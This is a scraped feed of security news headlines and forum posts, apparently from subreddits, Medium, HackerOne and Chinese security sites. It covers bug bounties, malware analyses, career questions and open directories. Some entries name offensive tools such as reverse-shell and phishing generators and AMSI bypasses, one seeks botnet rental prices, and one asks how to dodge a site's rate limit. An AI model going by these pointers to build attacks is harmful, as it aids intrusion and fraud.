• Open

    FreeBuf咨询服务 | 企业安全意识教育,让“网安周”永久在线
    网络安全已经成为工作学习不可缺少的一部分。
  • Open

    Lots of stuff in here music sorted by artist, videos, programs etc
    http://65.186.78.52/ submitted by /u/Akhenaten1049 [link] [comments]

  • Open

    Want to learn cyber security
    Greetings. I'm wondering if it's possible to get into the cyber security field without a degree. I'm in my early 40's and I hate my blue collar career. I've always loved IT stuff and have been very good at it. I just never focussed on my school studies in the past (due to late diagnosis of ADHD). I did take some courses way back when I was laid off such as A+ and Network+ which I thought myself and had certifications for (now long expired) I know I could do well with this but I'm wondering since I'm older, that it might be too late to follow this dream. I can't go to school full time since I work full time. Something along the lines of ethical hacking sounds interesting to me. Is it possible to learn on my own and get into a cyber security career? Where should I start and what certifications would I need? Any tips or advice from any one that's been in a similar situation? I'm in Canada if country makes a difference. Thanks! submitted by /u/Darth_Rayzor [link] [comments]
    Can I be infected by copying a bad file?
    I copy a potential malicious file and paste in a sandbox. Am I going to get infected by the copying file in say a email? How else could I get it to a sandbox submitted by /u/papervault [link] [comments]
    please explain the risk. vpn blocked from remote computer.
    I'm not sure if this is the right place to ask the question, sorry if its not. Its my works new policy that a computer cannot have a vpn connection into the office from a computer being accessed remotely. example: I have WorkPC in my closet, its got lots of ram, cpu, and i only install work apps on it. I have my HomePC that i use for most things that is mine, and i have nice multimonitor setup to go with it. I used to sit at HomePC, and remote desktop to WorkPC to do my work (both in my local network) but to do the work, once i'm connected to WorkPC, i connect WorkPC's vpn into work so i can checkout licenses and stuff. This is as of today blocked, so now i have to figure out how to move all my computers around to be able to get any work done. What is the threat they are trying to prevent? is it a realistic one? (how annoyed should i be right now?) any ideas how i should have my pcs setup? I also wanted the flexibility to connect to WorkPC from a laptop so i could do work from any location in my house, but this seems to break that too... it seems like my only solution is a work laptop + KVM switch + annoyance? Thanks. submitted by /u/rLarc [link] [comments]
    Getting more and more emails about suspicious activity on various accounts?
    It all started last week with Ubisoft and then a few days apart I keep getting the same thing from Microsoft, Mega and PayPal. I haven't clicked on any suspicious links and I do use a VPN only for a particular website, but never the ones I mentioned earlier and I haven't gotten on them in months. I checked my email address in https://haveibeenpwned.com and it was found in 5 breaches, so I guess I'm waiting for a 5th email telling me one of my accounts encountered suspicious activity. Right now I'm taking all safety precautions and changing my passwords and enabling Two-Factor Authentication where possible. But I'm still wondering why this is happening? submitted by /u/throacco19 [link] [comments]
  • Open

    IDOR on TikTok Seller
    TikTok disclosed a bug submitted by aidilarf_2000: https://hackerone.com/reports/1509057 - Bounty: $500
    CSRF Account Takeover
    TikTok disclosed a bug submitted by s3c: https://hackerone.com/reports/1253462 - Bounty: $2373
    IDOR allowing to read another user's token on the Social Media Ads service
    Semrush disclosed a bug submitted by a_d_a_m: https://hackerone.com/reports/1464168 - Bounty: $2000
  • Open

    From Hunted to Hunter
    Please note: this article contains potentially triggering stories about child sexual abuse Continue reading on Medium »
    L’espion Challange || CyberDefenders
    Hello Guys This is Abdelrahman Attia today we will solve L’espion Challange From Cyber Defenders Continue reading on Medium »
  • Open

    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    No content preview
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    No content preview
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    No content preview
  • Open

    StepSecurity releases tool that it used to improve security of 30 critical open-source projects…
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, retrieving data from other tables
    No content preview
    How To Hack With SQL Injection Attacks! DVWA low security — StackZero
    No content preview
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    No content preview
  • Open

    Disrupting SEABORGIUM’s ongoing phishing operations
    submitted by /u/SCI_Rusher [link] [comments]
    I will Live create a POC for CVE-2022-26923
    Tomorrow (08.17, at 20:00 EEST) I will stream How I Develop a POC for CVE-2022-26923 on my Twitch: https://www.twitch.tv/lsecqt ​ Feel welcomed guys! submitted by /u/lsecqt [link] [comments]
  • Open

    Disrupting SEABORGIUM’s ongoing phishing operations
    submitted by /u/SCI_Rusher [link] [comments]
    A Deep Dive Into Black Basta Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    SOVA malware is back and is evolving rapidly
    submitted by /u/Frank538 [link] [comments]
  • Open

    My Recon Tools
    Hello Amazing People, Continue reading on System Weakness »
    DOM XSS ON A GOV DOMAIN BYPASSING WAF
    Welcome back readers. I hope everyone is doing well. I have decided to do a writeup on a DOM Based XSS I recently found bypassing WAF… Continue reading on Medium »
    Cross-Site Scripting (XSS) Attacks
    Cross-site scripting (often shortened to XSS) is a common security vulnerability that is more prevalent in web applications. Continue reading on Medium »
    Monitoring Linux host metrics with the Node Exporter information disclosure $350
    Censys Continue reading on Medium »
    Apache Rootkits RCE
    penulisa: lalualowan Continue reading on Medium »
    Interview: The XSS Rat
    Bug bounty hunter, Teacher and Father Continue reading on Medium »
    IW Weekly #16: AWS Vulnerability, Threat Hunting, Reflected XSS, Pentesting Resource, Command…
    Hey 👋 Continue reading on InfoSec Write-ups »
  • Open

    SecWiki News 2022-08-16 Review
    [HTB] Antique Writeup by 0x584a 更多最新文章,请访问SecWiki
  • Open

    Multiple cloud vendors impacted by PostgreSQL vulnerability that exposed
    Article URL: https://portswigger.net/daily-swig/multiple-cloud-vendors-impacted-by-postgresql-vulnerability-that-exposed-enterprise-databases Comments URL: https://news.ycombinator.com/item?id=32483937 Points: 1 # Comments: 0
  • Open

    Things you can find in RAM that are useful in investigations.
    submitted by /u/DFIRScience [link] [comments]
    The Hitchhiker's Guide to DFIR: From Beginners and Experts
    I'm very excited to share the first edition of, what's been in the works for almost 5 months now, "The Hitchhiker's Guide to DFIR"; a project started by Andrew Rathbun as a proof of concept for a crowdsourced and opensource approach to publishing. The idea was simply to gather a bunch of people willing to write a chapter of their own choosing covering their stories, knowledge or experiences within the domain of DFIR. V1 contains chapters from some well-known forensicators as you might already know them. You can also find my chapter indexed 8th and titled "Artifacts as Evidence" where I share some of the artifacts that I encountered in the wild. What began as a fun and collaborative project, has now resulted in this small DFIR book. I hope it sparks the interest of beginners, helps the practitioners and is refreshing for the professionals! Note: This is a free distribution, you don't have to pay anything on the Leanpub landing page. Hitchhiker's Guide to… by Andrew Rathbun et al. [PDF/iPad/Kindle] (leanpub.com) submitted by /u/Nisarg12 [link] [comments]
  • Open

    family bible records
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    You. Are. Welcome. 🤗
    submitted by /u/ManaHoney504 [link] [comments]
    Various Music
    https://www.7xr.nl/Music/ ​ There's also https://www.7xr.nl/games/ for games submitted by /u/neheb [link] [comments]
    Index of /Files/
    submitted by /u/taramj13 [link] [comments]
  • Open

    FreeBuf早报 | “抄家”特朗普后网络威胁激增;抖音上线溯源等功能治理不实信息
    联邦调查局发出警告,自上周FBI在佛罗里达州突袭搜查前总统唐纳德·特朗普位于海湖庄园的住宅后,针对执法官员的网络威胁激增。
    macOS上的漏洞可能让攻击者访问Mac上的所有文件
    安全研究人员发现一个与macOS处理系统软件更新有关的注入漏洞可能会让攻击者访问Mac设备上的所有文件。
    新的 PyPI 包提供无文件 Linux 恶意软件
    Sonatype 研究人员发现了一个名为“secretslib”的新 PyPI 包,旨在将无文件加密矿工投放到 Linux 机器系统的内存中。
  • Open

    南亚 Patchwork APT 组织新活动特点分析
    作者:知道创宇404实验室APT高级威胁情报团队,K &Nan 1. 概述 Patchwork是自2015年12月以来一直活跃的南亚APT组织。该组织长期针对中国、巴基斯坦等南亚地区国家的政府、医疗、科研等领域进行网络攻击窃密活动。PatchWorkAPT是一个比较有意思的名字,源于该组织武器库是基于开源的代码拼凑而成(地下论坛、暗网、github等等)。知道创宇404实验室APT高...
  • Open

    南亚 Patchwork APT 组织新活动特点分析
    作者:知道创宇404实验室APT高级威胁情报团队,K &Nan 1. 概述 Patchwork是自2015年12月以来一直活跃的南亚APT组织。该组织长期针对中国、巴基斯坦等南亚地区国家的政府、医疗、科研等领域进行网络攻击窃密活动。PatchWorkAPT是一个比较有意思的名字,源于该组织武器库是基于开源的代码拼凑而成(地下论坛、暗网、github等等)。知道创宇404实验室APT高...

  • Open

    Want to LEAVE Pentesting
    FYI - crosspost to get more opinions Hi all - I know usually the posts are "I want to get into pentesting". I have the opposite predicament. I'm a internal OT/IT Pentester. I perform assessments on pretty much everything. SCADA, DCS, Web Apps, Authentication systems, Network, Active Directory, you name it. I've been doing this for about a year now and can see myself doing it for maybe 1 more year. Responsibilities other than pentesting: Purple team engagements with SOC build out red team infrastructure for testing exploits/TTPs Python, PowerShell, bash scripting/automation for tooling/workflows Reasons I'd like to leave: I travel about 6-7 times a year. I have a good balance and although I'm young - I prefer a role that is more structured and eventually I would prefer to tra…
    How does the periodic cyber security report should look like?
    Hi, I have been asked by our company’s head of cybersecurity to prepare monthly report related to cybersecurity technologies. What things report should contain? Can anyone share the suggestions or sample report? submitted by /u/techno_it [link] [comments]
    Confused on what point to begin learning
    How much code/what languages should I know beforehand before indulging in learning hacking methods, Red/Blue strategies and try to get certified in Cybersecurity to be able to breeze by and not struggle as much in comparison to not knowing and coding skills? submitted by /u/fawzi97 [link] [comments]
    Can tik tok on Android access my MFA code in Authy or Google Authenticator?
    I've read some really bad articles saying that Tik Tok is overly permissive on Android. Could tik Tok in theory access the MFA codes on my phone if I scanned the QR codes to add them into either Authy or Google Authenticator before I installed Tik Tok? submitted by /u/cryptocritical9001 [link] [comments]
    How many goals does symmetric and asymmetric encryption achieves?
    Authentication Integrity Non-Repudiation Confidentiality Is my question even correct? Because I'm seeing lots of books are saying symmetric encryption can't provide non-repudation. So, can we generalize for all symmetric cryptography? And what about asymmetric? Does it achieves all goals? submitted by /u/syavage [link] [comments]
    Data Security and Privacy: Using a Dedicated Proxy Server and NordVPN
    r/AskNetsec As the title says, I'm trying to get the most secure and fastest connection possible. I work in the financial services industry and stream in my off-time so I have a couple of questions about online privacy and security. ​ Is there a benefit of using BOTH a dedicated proxy server and VPN at the same time? In my mind, the proxy server hide my IP address, then the VPN both hides the proxy IP address and encrypts the data. I set up my dedicated proxy server through Windows 10 directly. No issues whatsoever. If this the best and most secure method? I have 5 dedicated proxy servers and only using one that's managed by Windows 10? Several apps are set up through NordVPN with tunneling and a killswitch including Tor, Signal, OBS, and several other apps. When I try this with Google Chrome all while using my proxy server, it doesn't connect to the internet? Is there a fix for this? Should be noted, I'm able to use and connect to the internet through Chrome using my proxy server if I'm using the NordVPN Chrome extension - but the tunneling and kill switch isn't in place? Is there a fix for this? ​ The most secure way of browsing the internet is obviously using Tor with my proxy and VPN, but are there any other methods of increasing my privacy and security outside of using a dedicated proxy server and VPN at the same time? I'm open to suggestions of any sort. submitted by /u/fletchketchem [link] [comments]
    Availability and pricing of Botnets (Botnet-as-a-Service)
    Hi r/AskNetsec! I'm preparing myself for presentation regarding bots and botnets. I will be talking about types of bots like good bots, bad bots, and what they can do, how you can protect yourself againts them, some information about popular botnets that were used in recent years, how IoT devices are insecure and can be used to attack (Miraibot example), etc. One of my talking points is how in the recent years the prices of renting servers and services went down which makes creating botnets more affordable than ever. I wanted to provide some examples with pricing but this is where i stumbled into a wall. I've looked over more popular underground marketplaces and found only offers for buying bots to create your own botnet, training materials on how to create botnets, services for generating likes, subscribers or discord bots or DDoS. Nothing related to renting botnets infrastructure for attacks like spamming, credential stuffing, ransomware, password bruteforcing, etc. During my research I've found some articles regarding this topic, but they are pretty old and the prices themselves are all over the place. https://www.zdnet.com/article/study-finds-the-average-price-for-renting-a-botnet/ https://www.secplicity.org/2017/03/07/know-much-costs-rent-iot-botnet/ https://datadome.co/learning-center/what-is-ddos-booter-botnet-booter/ My kind question to You all is if you could provide me with some info on the pricing or screenshots of the offers if you have seen any recently? Direct links are most likely againts this subreddit rules, so only price and botnet type info and for screenshots the seller and any other details that could point to the particular marketplace/seller can be blurred. Thanks! submitted by /u/vlot321 [link] [comments]
  • Open

    Process Behaviour Anomaly Detection Using eBPF and Unsupervised-Learning Autoencoders
    submitted by /u/sanitybit [link] [comments]
    Tracking Internet facing Industrial Control System devices
    submitted by /u/Mysterii8 [link] [comments]
    Why Action Bias Is Damaging Your Security Response
    submitted by /u/mesok8 [link] [comments]
    EvilPLC Attack: Using a PLC to Gain Code Execution on Engineering Workstation
    submitted by /u/derp6996 [link] [comments]
    Attacking Google's Titan M Security Key with Only One Byte
    submitted by /u/sanitybit [link] [comments]
    HijackLibs: an open-source, community-driven project tracking DLL Hijacking opportunities in in Windows
    submitted by /u/sanitybit [link] [comments]
    STrace: MIT Licensed Windows Reimplementation of DTrace
    submitted by /u/sanitybit [link] [comments]
    NthLink VPN found to be regular shadowsocks using same pre-shared keys for all users
    submitted by /u/yarmak [link] [comments]
  • Open

    HacktheBox [Devzat]
    Devzat was a Medium ranked box on the HacktheBox platform involving heavy enumeration. The initial foothold is gained by identifying a… Continue reading on Medium »
    HacktheBox[Meta]
    Meta was a medium machine on HacktheBox. By identifying an additional virtual host, the user is able to find an API running exiftool… Continue reading on Medium »
    HoaxShell — Reverse Shell
    HoaxShell é uma ferramentas desenvolvida em Python que gera payloads capaz de realizar o bypass no Windows Defender e em outros Antivírus… Continue reading on 100security »
    CRTP Review
    TLDR; Continue reading on Medium »
    eLearnSecurity Penetration Testing Professional ( eCPPT ) Review
    eCPPT/PTP Writeup Continue reading on Medium »
  • Open

    New Bug Bounty Alert: Welcome Solace Finance!
    After an exciting partnership announcement, we welcome Solace Finance as the newest bug bounty vault! Continue reading on Medium »
    Vega Bug Bounties
    Starting today, Monday 15th of August 2022, the Vega Protocol is officially launching the Vega Bug Bounty Program! Continue reading on Vega Protocol »
    FFUF Tool 9 tips, File Inclusion Guide, Code Injection Guide | MONDAY HACKING | BotAmi | EPISODE…
    Hello, Hackers 👋👋 Continue reading on Medium »
    How to **actually** use Amass more effectively — Bug Bounty
    99% of bug hunters only use 1% of Amass’ potential… Continue reading on Medium »
    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    SQL Injection
    In this section, I’ll explain what SQL injection is, describe some common examples, explain how to find and exploit various kinds of SQL… Continue reading on Medium »
    Business Logic Vulnerability via IDOR
    Exploiting a Logic Vuln via IDOR. #Bugbounty Continue reading on Medium »
  • Open

    CHFI v 10 new topics
    i bought the course for CHFI v9 from ec council a while ago and delayed writing the exam till now, now the exam is based on v10 and i know most of the content is same but the 2 new added modules are missing IoT Forensics , Dark Web Forensics. anyone know of any good resources where i can read about these topics myself. any help would be much appreciated, thank you submitted by /u/Top-Law8118 [link] [comments]
    Demonstrating Basic Computing Knowledge
    I have the opportunity to apply for a digital forensics position that will train. There is no digits forensic experience required. That being said, it is very competitive. If I wanted to gain some tangible skills to demonstrate I have some knowledge of computing, would you recommend getting CompTIA A+, S+, N+? Any others? I know these do not necessarily correlate directly with digital forensics. submitted by /u/invictusliber [link] [comments]
  • Open

    Giving away some wireless gear (alfa cards, d-links) to two people
    Hey r/ExploitDev - I was clearing out some things from my office this weekend and came across two Alfa 802.11b/g wireless cards and two DIR-601s. I used these a while back when I was doing the OSWP labs. [Timestamp](https://i.imgur.com/SvQhRyn.jpg) I spoke with the mods and they are cool with me doing a giveaway raffle for these. There is nothing fancy about the routers or the alfa cards (they are both old commodity hardware) but could be beneficial if you are looking to take the OSWP or starting to study the basics of 802.11 attacks. Raffle Terms: Comment to enter RedditRaffler will be used to select two winners approximately 24 hours from now I'll contact the winners via DM and ship you one Alfa card and DIR-601 "kit" seen in the above timestamp. I'll pay for the shipping costs. CONUS-Only shipping Minimum account age is 30 days Thanks! submitted by /u/Bowserjklol [link] [comments]
  • Open

    Update Zoom for Mac now to avoid root-access vulnerability
    Article URL: https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/ Comments URL: https://news.ycombinator.com/item?id=32472030 Points: 14 # Comments: 2
  • Open

    SecWiki News 2022-08-15 Review
    【自动化赏金之路】初试3个月 收入10000块的总结 by BaCde SecWiki周刊(第441期) by ourren ModSecurity 自建规则之路 by SecIN社区 SANS 2022 年威胁狩猎调查报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-15 Review
    【自动化赏金之路】初试3个月 收入10000块的总结 by BaCde SecWiki周刊(第441期) by ourren ModSecurity 自建规则之路 by SecIN社区 SANS 2022 年威胁狩猎调查报告 by Avenger 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 网信办公布微信淘宝抖音等算法备案;两款红米手机被曝存在安全漏洞
    国家网信办公开发布了境内互联网信息服务算法名称及备案编号,包括多个大型企业和产品的相关算法。。
    Black Hat 2022 | 三大趋势已成世界定局
    Black Hat被公认为“黑客界的奥斯卡”,着眼于当下实际的安全态势,分享前沿的安全研究、安全产品和解决方案。
    Black Hat 2022公布14大研究新发现
    PCMag选出了本届大会上14个重磅研究成果,让我们通过本文来一一窥探。
    CISA、FBI 发布联合公告,警告 Zeppelin 勒索软件攻击
    Zeppelin 勒索软件于2019 年11月首次出现在威胁领域。
    竟然不设密码!调查发现全球超9000台VNC 服务器存暴露风险
    在黑客论坛上,通过暴露或破解的VNC访问关键网络的需求很高,在某些情况下,这种访问可以用于更深层次的网络渗透。
    美国制裁加密货币混合,Tornado Cash员工遭逮捕
    荷兰有关当局宣布,美国在阿姆斯特丹逮捕了一名加密货币混合器工作的软件开发人员。
    Killnet黑客组织声称已“攻破”洛克希德-马丁公司
    《莫斯科时报》披露,黑客组织 Killnet 声称对航空航天和国防巨头洛克希德-马丁公司发动了一次大规模 DDoS 攻击。
    因收集Android 位置数据,Google被罚六千万美元
    澳大利亚公平竞争和消费者委员会称,谷歌因收集数据时误导用户,被处以6000万澳元(约合人民币2.88亿元)罚款。
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    Salesforce bug hunting to Critical bug
    Or how I learned that some bugs are truly rare Continue reading on InfoSec Write-ups »
    Irremovable guest in facebook event — Facebook bug bounty
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection UNION attack, finding a column containing text
    No content preview
  • Open

    ConINT 2020 and CTF in Five Swinging Iced Girrafes!
    OK so here goes! The first of my throwback sessions! Let’s go back to the weekend of 17th October 2020! Continue reading on Fitness Drinking Security Code »
  • Open

    Burp2Malleable - turn HTTP requests into MalleableC2 profiles
    submitted by /u/CodeXTF2 [link] [comments]
  • Open

    Mega Cooking Recipe "open" dir - looking for possible ways to get this downloaded
    http://www.justbeefrecipes.com - plus 18 more websites, all accessible via the top bar. 91.3K recipes across all sites. Plain text, no images, basically a somewhat fancy opendir. Important to note that these sites only allow 200 requests per IP per day, however this is on a per-site basis. I stumbled across this while looking for more sources to put in version 2 of my cooking recipe archive. However, the aforementioned limit of 200 files per day is not at all ideal. wget and other utilities will carry on downloading after the limit, however the files downloaded will, instead of recipe content, contain an error mentioning this limit. I have a VPN that I can switch IPs with, which works fine, but the real issue is getting these download utilities to pick up where they left off. I haven't yet found a way to force wget or curl to pause downloading after 200 files, and let me switch IPs. This would also get pretty tedious very quickly - 91K recipes means around 455 manual IP switches in all (assuming no cross-site IP usage). ​ So I'm curious - has anyone else run into a site like this, and found a way to download it in an efficient manner? submitted by /u/WAUthethird [link] [comments]

  • Open

    Evade Windows Defender Mimikatz detection by patching the amsi.dll
    submitted by /u/sanitybit [link] [comments]
    DC30 Mainframe Buffer Overflow workshop. This docker container has everything you need to learn how to do MVS buffer overflows.
    submitted by /u/sanitybit [link] [comments]
    Process injection: breaking all macOS security layers with a single vulnerability
    submitted by /u/sanitybit [link] [comments]
    wtfis - A commandline tool that gathers information about a domain or FQDN using various OSINT services and displays them formatted for human consumption.
    submitted by /u/sanitybit [link] [comments]
    From Oscilloscope to Wireshark
    submitted by /u/sanitybit [link] [comments]
    Hacking Zyxel IP cameras to gain a root shell
    submitted by /u/hydrogen18 [link] [comments]
    Threatest, a Go framework for end to end testing threat detection rules
    submitted by /u/thorn42 [link] [comments]
  • Open

    nuclear power documents
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Tonic
    submitted by /u/Plastic_Preparation1 [link] [comments]
    Quite a few movies in 720p mp4 format, mostly from 2016-17
    submitted by /u/draebor [link] [comments]
    Grabbing files from Google Drive
    Looked over the posts and here and not finding what I am looking for. Is there an easier way to grab files from Google Drive other waiting for the files to zip and then download? submitted by /u/belly_hole_fire [link] [comments]
  • Open

    If proxychain is not encrypted why is it used
    can its protocols be changed submitted by /u/Iam_really_need_name [link] [comments]
    Best certification/courses for network security?
    Looking for the best courses/certs to get to improve my network security skills. Things similar to monitoring packets for malicious activity like DNS beaconing, investigating firewall IDS/IPS events, NGFW configuration, best practices, etc. submitted by /u/Professional-Dork26 [link] [comments]
    Building a Home Lab
    Hey everybody. Currently I am trying to set up a virtual environment so that I can practice on it. I do have a couple of questions though. How would you guys recommend setting up a homelab? I use Fedora as my daily driver and then I have a Kali vm installed with KVM/Qemu via Virt-Manager. My initial plan was to whip up a Windows 10 vm in Virtualbox on my spare mac and then attack it with my Kali machine. I was going to set up the Windows box as 'Host-Only' so that it is isolated. But all the research and videos I have watched only show how to set up a 'Host-Only' network between two virtual machines on the same host computer. Is it possible to set up the scenario that I am describing? To isolate a windows machine on virtualbox and attack it on my other computer using virt-manager? I am under the impression that my 'vulnerable' box should be on the Host Only network mode just for security reasons. But if that is the case, how would I connect to it to attack it? I am pretty sure that what I am describing makes sense but if it turns out that I am wrong and it doesn't, I do apologize! I haven't been on my ethical hacking journey for very long so I am sorry if this is a dumb question or if it has a very simple answer. Thanks! TL;DR: How to isolate a Windows vm on virtualbox within my Mac OS Host and be able to attack it via my Kali machine via Virt-Manager on my Linux host. ​ P.S. Sorry if this isn't the right sub - I tried posting in an ethical hacking and cybersecurity sub but the first one hasn't gotten any replies and the latter deleted my post. Just trying to get some information on this so I can practice. submitted by /u/strings_on_a_hoodie [link] [comments]
    How likely is it to catch a virus nowadays, assuming a standard, up-to-date antivirus?
    I assume many people don't necessarily follow best practices in the digital world - download and run executables from dubious websites, for example. I wonder how prevalent is it for them to catch malware nowadays, provided they have a standard, up-to-date antivirus. Does most widespread malware exploit zero-day attacks and become detected by antiviruses after a few hours/days? How prevalent is more sophisticated malware that can stay undetected for weeks/months? Specifically, How hard is it for attackers to devise keyloggers and ransomware? submitted by /u/Curious-Brain2781 [link] [comments]
    Help me take a step forward in my career
    I’m a software dev with a some years of experience. I’ve always worked for security companies and on security products, so I have lots of exposure to the industry. I find that I like security way more than I like writing code. I’d like to make it my full time job. However, financially I can’t go back to square 1. I am looking for advice on how I can pivot to a true security career while not losing all of the seniority that I’ve built up. I think that security engineer is a logical spot to jump to, but I’m unsure. I am also curious if there are certs that I should pursue. My company will pay for them, but many seem to be either focused on red team (OSCP) or management (CISSP). submitted by /u/Weary_Drummer2211 [link] [comments]
  • Open

    Win NTFS image question
    I have an image of an HD from a 1 year old Dell desktop. It appears to be a windows NTFS but there are no users folders, many other typical windows folders are missing. The drive only has 9.5 GB of data out of 1TB. It is not zeroed, and the image is obviously not bootable. Trying to figure out what could have happened. submitted by /u/SquareEastern4454 [link] [comments]
    INDUSTRIAL SSD, 256GB, MLC,
    submitted by /u/Simply4U2bu [link] [comments]
  • Open

    From Open Redirect to Reflected XSS manually
    # For the purpose of this write-up, and the integrity of the company, we’ll consider that the target we’re testing is: >… Continue reading on Medium »
    Internal Bug Bounty’s & The Importance of Timing
    Read Time: 3 minutes Continue reading on Medium »
    Step 18: Information Gathering — Web Edition
    Been a few days folks, apologies. Orientation at the new job, getting more apartment stuff… it finally feels cozy and homely! Continue reading on Medium »
    How I got into the United Nations’ Hall of Fame
    Continue reading on Bug Zero »
  • Open

    User-Agent — Como alterar pelo Navegador?
    O cabeçalho de requisição User-Agent é uma cadeia de caracteres característica que permite servidores e pares de rede identificar a… Continue reading on 100security »
    PyPhisher — Gerador de Phishing
    O PyPhisher é um gerador de Phishing de mais de 78 sites, dentre estes Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify e muito mais. Continue reading on 100security »
  • Open

    How to OSINT Russia? part 2
    Tips on searching individuals and businesses through russian websites. Continue reading on Medium »
    Disinformation Days
    While I’m busy finding my way in open source research— and tip of the hat: I’m happy to announce that I’m already contributing to a number… Continue reading on Medium »
    SPY NEWS: 2022 — Week 32
    Summary of the espionage-related news stories for the Week 32 (August 7–13) of 2022. Continue reading on Medium »
  • Open

    SecWiki News 2022-08-14 Review
    云隔离的梦想 by ourren 云安全入门材料 by 路人甲 netspy-快速探测内网可达网段工具 by 路人甲 SnakeYaml反序列化 by 路人甲 Executor内存马的实现 by 路人甲 How I Hacked my Car by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-14 Review
    云隔离的梦想 by ourren 云安全入门材料 by 路人甲 netspy-快速探测内网可达网段工具 by 路人甲 SnakeYaml反序列化 by 路人甲 Executor内存马的实现 by 路人甲 How I Hacked my Car by ourren 更多最新文章,请访问SecWiki
  • Open

    FreeBuf早报 | 首批针对星链卫星网的攻击手法曝光;Instagram被曝跟踪用户网络活动
    研究人员只需要花费25美元,就能用小零件制作出硬件入侵工具,在星链卫星天线上运行任意代码。
  • Open

    How useful is CVSS Score in CVE triage – The CVSS who cried wolf
    Article URL: https://inthewild.io/blog/how-useful-is-cvss-score-in-CVE-triage Comments URL: https://news.ycombinator.com/item?id=32459335 Points: 1 # Comments: 0
  • Open

    WiFi Standard 802.11ac Packet Analysis
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Post which compared all exploit dev certifications
    Around a month or so ago I saw on this subreddit a post which had a spreadsheet with all the exploit development certifications compared by topics which they covered but I can't seem to find it now. Does anyone have a link to that post or spreadsheet? If so I'd highly appreciate it. Thanks in advance. submitted by /u/xor_eax_eax_ [link] [comments]

  • Open

    Lina Lau: How to Reverse Engineer and Patch an iOS Application for Beginners: Part I
    submitted by /u/KeepYourSleevesDown [link] [comments]
  • Open

    OSINT Tool to know
    In the Previous Blog, we know What is OSINT now we have to know what tools are used to do OSINT. Continue reading on Medium »
  • Open

    Pentesting vs Bug Bounty
    Can pentesters instantly become great bug bounty researchers? It may not be as trivial as one might think Continue reading on Medium »
    How I earned a $7000 bug bounty from Grab (RCE Unique Bugs)
    Table of Contents Continue reading on Medium »
    My blackhat stories- How I hacked my school and got a CVE for it.
    Intro: Continue reading on Medium »
    Bypassing unexpected IDOR
    Hello guys, I am back again with another writeup on my very recent bug finding on HackerOne Private VDP. In this writeup I am gonna tell… Continue reading on Medium »
    Escalating Open Redirect to XSS
    Hello everyone. Myself Sagar Sajeev. Continue reading on Medium »
    Latest Bug Bounty Programs, this Aug, Proud Year 2022
    Have you heard about the daily bug bounty programs that invite programmers to find out issues with the software or app they have developed… Continue reading on Medium »
    An Unusual Tale of Email Verification Bypass
    Hey Guys. I’m Sagar Sajeev . Continue reading on Medium »
    Directory Traversal — Explicação [PT/BR]
    Hoje eu resolvi fazer um pouco diferente, normalmente eu tenho mais o hábito de escrever sobre write-ups do que sobre as vulnerabilidades… Continue reading on Medium »
  • Open

    PyPhisher — Gerador de Phishing
    O PyPhisher é um gerador de Phishing de mais de 78 sites, dentre estes Facebook, Gmail, NetFlix, Tiktok, Twitter, Spotify e muito mais. Continue reading on Medium »
    MSIEXEC — Windows Exploitation
    Utilizando o msfvenom conseguimos gerar payloads em MSI que podem nos auxiliar no processo de exploração do Windows e neste artigo… Continue reading on 100security »
    MSFConsole — Captura de Senhas
    O msfconsole possui um módulo auxiliar que permite que você inicie serviços tais como: FTP, Telnet, VNC, SMB, HTTP, MSSQL, PostgreSQL… Continue reading on 100security »
  • Open

    What is your process for investigating a suspicious link/URL?
    Details around thought process, tools and methods used would be highly appreciated! Even better if the answer is geared towards an enterprise/SOC environment. submitted by /u/Jaruki_Jurakami [link] [comments]
    What is bloom.exe written in?
    Bloom.exe seems to be adware, or a trojan. Malware, of some kind. What i'm wondering, is if someone has downloaded it to somewhere it won't work... and looked at it's code. And if so, what the language is. I have been getting into scripting... and i'm quite curious, about what language the more modern malware, is scripted in. Even something as simple as a screenshot, will probably satisfy my curiosity. submitted by /u/NinaMercer2 [link] [comments]
    Is it possible to block network access for a specific app on iOS?
    I included lots of details and context in my previous attempt to post this question, but it was deleted by mods due to not being narrowly cast, so I've tried to address that by asking a yes/no question even though my question is actually more about "how". I can reply with details but won't include them here for fear of my question being deleted again. submitted by /u/hc5u [link] [comments]
    Disabling 2FA requires only password knowledge in a google account. How to mitigate this?
    Say a hacker gets control of my computer and has access to my keystrokes. He can change any security settings of the Google account - disable 2FA, change the password, revoke backup codes, etc. - all this just by authenticating via the password (which he can get from the keystrokes). Google doesn't require the 2nd-factor authentication in this scenario (since the session is trusted - it's from my PC). I worry that this kind of attack might happen, and make me lose my Google account. Is there a way to somehow mitigate this risk and enforce 2FA for every such critical action? Reference: https://www.infoq.com/news/2020/07/google-password-2fa-woes/ Thanks! submitted by /u/Curious-Brain2781 [link] [comments]
    A question for somebody who knows how to hack an iPhone
